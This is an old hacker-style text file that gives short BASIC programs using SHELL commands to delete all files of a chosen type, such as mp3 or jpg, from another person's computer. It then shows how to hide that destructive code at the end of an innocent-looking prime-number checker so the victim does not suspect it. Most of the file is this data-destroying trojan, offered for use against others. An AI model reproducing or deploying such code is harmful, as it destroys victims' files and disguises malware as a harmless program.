WHO SAYS BASIC IS OUTDATED AND USELESS !!
IF YOU WISH TO COPY THESE..PLEASE ASK BEFORE YOU DO SO
!
1)Here is the basic program
10 rem the deadman wrote it http://zap.to/cyberhack !(please dont
remove this)
20 shell "cd\"
30 shell "del *.(file extension)"
40 end
now you have to replace the file extension bracket with the actual files
you want deleted !!jpg,avi, any ~!
NOTE :i am not sure if you can delete exe's cause when you try to delete
..the computer will ask for conformation !!
If you know that he has mp3 files saved on his desktop/any folder...and you want to delete it !!
2)Here is the basic program
10 rem the deadman wrote it http://zap.to/cyberhack !(please dont
remove this)
20 shell "cd\"
30 shell "cd (the location)"
40 shell "del *.(file extension)
50 end
now you will have to replace the location brackets with the location
!
eg if you want todelete his/her mp3 files from the desktop...
then you replace line 30 with 30 shell "cd windows\desktop"
and line 40 with 40 shell "del *.mp3"
If you wish to hide the program in a program in a program which finds out if a number entered by the user is prime or composite ( this will prevent suspicion )
10 input "type in a no";n
20 for i=2 to n/2
30 if (n/i)=int(n/i) then print "the no is composite :goto 60
40 next i
50 print "prime no"
60 (start the bad part here)
replace start the bad part here with which ever program !!!